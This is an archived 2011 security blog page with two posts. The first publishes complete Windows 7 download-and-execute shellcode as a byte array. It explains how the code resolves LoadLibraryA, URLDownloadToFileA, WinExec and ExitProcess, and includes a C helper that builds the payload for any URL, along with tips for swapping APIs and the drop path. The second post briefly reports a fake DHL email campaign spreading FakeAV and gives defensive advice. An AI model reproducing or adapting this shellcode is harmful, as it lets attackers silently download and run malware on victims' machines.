Archive for April, 2011

Apr 09 2011

Download and Execute shellcode on Windows 7

Published under Security Research

Recently, I needed a shellcode to download and execute an .exe file on Windows 7 for an experiment. However, no such shellcode was available.

Meanwhile, the download-and-execute shellcode generated by the Metasploit Framework does not currently work on Windows 7, and searching the Internet did not turn up anything usable.

With reference to SkyLined's shellcode and some other shellcodes from milw0rm.com, I wrote a shellcode of my own, and this is the result I would like to share with you:

/* Download-and-execute stub; the URL is appended as a NUL-terminated string. */
unsigned char shellcode[] =
"\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E"
"\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67"
"\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99"
"\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE"
"\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C"
"\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C"
"\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83"
"\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4"
"\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77"
"\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78"
"\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7"
"\xFF\xFF\xFFhttp://website.com/file.exe";

As can be seen, the URL is placed at the end of the shellcode as a NUL-terminated string. The stub locates it at run time, so it can be replaced with a URL of any length without patching any offsets in the bytes before it.
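What the bytes do, read from the opcodes. The 80 bytes after the initial `jmp` are a resolver: it takes the PEB from `fs:[0x30]`, follows `Ldr` to `InInitializationOrderModuleList`, and for each loaded module walks the export name table, hashing every name with `add dl,[edi]; ror edx,4` (over each byte of the name, including the terminating NUL) and comparing the result with the hash passed on the stack; a module without a match is skipped and the next one is tried. Because it scans every module instead of assuming kernel32.dll sits at a fixed position in the list, it survives the changed list order on Windows 7, which is the usual reason older stubs fail there. The body then resolves four APIs in turn: LoadLibraryA("urlmon.dll"), URLDownloadToFileA(NULL, url, "C:\x.exe", 0, NULL), WinExec("C:\x.exe", 0) and ExitProcess(0). The URL's address comes from a `call` back into the stub, which leaves the address of the bytes following it (the URL) on the stack as the szURL argument, and the four `dec esp` before the WinExec call step back over the stale szFileName slot so the same "C:\x.exe" pointer is reused as lpCmdLine. Note that the download path is hard-coded to the root of C:, where a non-elevated process on Windows 7 normally cannot create files; patching the four path bytes is easier than patching the URL handling.

The program below is an added example, not the author's ASM source: it reimplements the hash from the opcodes, confirms that the four immediates pushed in the stub are the hashes of the four API names above (and that the stub really pushes them), and shows how to append a different URL while keeping the terminating NUL that a `strlen()`-sized copy of the array would drop. The stub bytes are those of the post minus the URL; the hash constants are the little-endian immediates of its `push` instructions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Export-name hash of the resolver at the top of the stub, reimplemented
 * from its opcodes (not the author's code): starting from edx = 0, for each
 * byte of the name INCLUDING the terminating NUL do
 *     add dl,[edi]      ; only the low byte changes, no carry into dh
 *     ror edx,4 */
uint32_t ror4_hash(const char *name)
{
    const unsigned char *p = (const unsigned char *)name;
    uint32_t h = 0;
    for (;;) {
        h = (h & 0xffffff00u) | ((h + *p) & 0xffu);  /* add dl,[edi] */
        h = (h >> 4) | (h << 28);                      /* ror edx,4   */
        if (*p == 0)                                   /* scasb found the NUL */
            break;
        p++;
    }
    return h;
}

/* The 179-byte stub from the post, i.e. the array above without its
 * trailing URL. It contains no NUL byte, so strlen(stub) == STUB_LEN. */
static const char stub[] =
    "\xEB\x50\x31\xF6\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B\x6E"
    "\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B\x4B\x18\x67"
    "\xE3\xEC\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31\xC0\x99"
    "\x02\x17\xC1\xCA\x04\xAE\x75\xF8\x3B\x54\x24\x04\xE0\xE4\x75\xCE"
    "\x8B\x53\x24\x01\xEA\x0F\xB7\x14\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C"
    "\x97\xC3\x68\x8E\x48\x8B\x63\xE8\xA6\xFF\xFF\xFF\x66\xB8\x6C\x6C"
    "\x50\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C\x6D\x54\xFF\xD5\x68\x83"
    "\x2B\x76\xF6\xE8\x8A\xFF\xFF\xFF\xEB\x21\x50\xFF\xD5\x68\xE7\xC4"
    "\xCC\x69\xE8\x7B\xFF\xFF\xFF\x50\x4C\x4C\x4C\x4C\xFF\xD5\x68\x77"
    "\xA6\x60\x2A\xE8\x6A\xFF\xFF\xFF\x50\xFF\xD5\x50\x68\x2E\x65\x78"
    "\x65\x68\x43\x3A\x5C\x78\x50\x50\x89\xE3\x80\xC3\x08\x53\xE8\xC7"
    "\xFF\xFF\xFF";
#define STUB_LEN (sizeof stub - 1)

/* Hash immediates the stub pushes before each "call resolver", and the API
 * each one selects (the name whose ror4_hash equals the constant). */
static const struct { const char *name; uint32_t imm; } calls[] = {
    { "LoadLibraryA",       0x638B488E },
    { "URLDownloadToFileA", 0xF6762B83 },
    { "WinExec",            0x69CCC4E7 },
    { "ExitProcess",        0x2A60A677 },
};
#define NCALLS (sizeof calls / sizeof calls[0])

/* 1 if the stub contains the instruction "push imm32" for this value. */
int stub_pushes(uint32_t imm)
{
    unsigned char pat[5] = { 0x68, (unsigned char)imm, (unsigned char)(imm >> 8),
                             (unsigned char)(imm >> 16), (unsigned char)(imm >> 24) };
    for (size_t i = 0; i + sizeof pat <= STUB_LEN; i++)
        if (memcmp(stub + i, pat, sizeof pat) == 0)
            return 1;
    return 0;
}

/* 1 if every API name hashes to a constant that the stub really pushes. */
int verify_stub_hashes(void)
{
    for (size_t i = 0; i < NCALLS; i++) {
        uint32_t h = ror4_hash(calls[i].name);
        if (h != calls[i].imm || !stub_pushes(h))
            return 0;
    }
    return 1;
}

/* Stub + NUL-terminated URL. Returns bytes written, or 0 if out is too small.
 * The NUL matters: URLDownloadToFileA reads szURL up to it, and copying the
 * post's array with strlen() instead of sizeof would drop it. */
size_t build_payload(const char *url, unsigned char *out, size_t cap)
{
    size_t ulen = strlen(url), need = STUB_LEN + ulen + 1;
    if (cap < need)
        return 0;
    memcpy(out, stub, STUB_LEN);
    memcpy(out + STUB_LEN, url, ulen + 1);
    return need;
}

/* Builds a payload for url and checks its layout; returns its length or 0. */
size_t payload_check(const char *url)
{
    unsigned char buf[1024];
    size_t n = build_payload(url, buf, sizeof buf);
    if (n == 0 || memcmp(buf, stub, STUB_LEN) != 0 ||
        memcmp(buf + STUB_LEN, url, strlen(url)) != 0 || buf[n - 1] != 0)
        return 0;
    return n;
}

int main(void)
{
    for (size_t i = 0; i < NCALLS; i++)
        printf("%-19s %08X %s\n", calls[i].name, calls[i].imm,
               ror4_hash(calls[i].name) == calls[i].imm ? "hash ok" : "MISMATCH");
    printf("stub %zu bytes, null-free: %s\n", (size_t)STUB_LEN,
           strlen(stub) == STUB_LEN ? "yes" : "no");
    printf("payload for website.com example: %zu bytes\n",
           payload_check("http://website.com/file.exe"));
    return verify_stub_hashes() ? 0 : 1;
}
```

The same hash routine lets you pick a different API set (for example CreateProcessA instead of WinExec) by computing the new constant and patching the five-byte `push` that precedes the corresponding `call`; the stub's stack layout at that call must still match the new function's argument count, since every call is stdcall and the callee cleans up.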

Download ASM source code

The shellcode was tested successfully on Windows 7, and it may also work on Windows 2000 and later versions.

Le Manh Tung
Senior Security Researcher


Apr 05 2011

New campaign faking DHL Express Services to spread FakeAV

Published under Security Research

Recently, our honeypot system detected a new campaign in which attackers use bogus customer-service emails, purporting to come from DHL, the well-known express delivery company, to spread FakeAV.

(Image: content of the fake email)

Still exploiting users' curiosity and "greed", the attackers send emails with enticing content to lure users into opening the attached file. Once the file is opened, the user has unwittingly "opened the door" for FakeAV to infect the computer.

(Image: after infection, FakeAV "threatens" the user with fake notifications)

The malware (named W32.FakeDHL.Worm by Bkav) downloads FakeAV from a server located in Russia, where using computer viruses to make money is rampant:

(Image: address from which FakeAV is downloaded)

Ransomware and FakeAV are known as the best "money-makers" in the malware world, and new variants are continually generated and upgraded with new ways to spread. Therefore, while waiting for the authorities to enact laws and take specific action against these forms of phishing, you are advised to actively protect your own computer. Besides being wary of email attachments, it is advisable to equip your computer with a licensed antivirus program so that you receive regular updates and timely support from experts. Do not try to save on the cost of licensed software only to lose a much larger sum to the bad guys.

Pham Tuan Vu

Malware Researcher
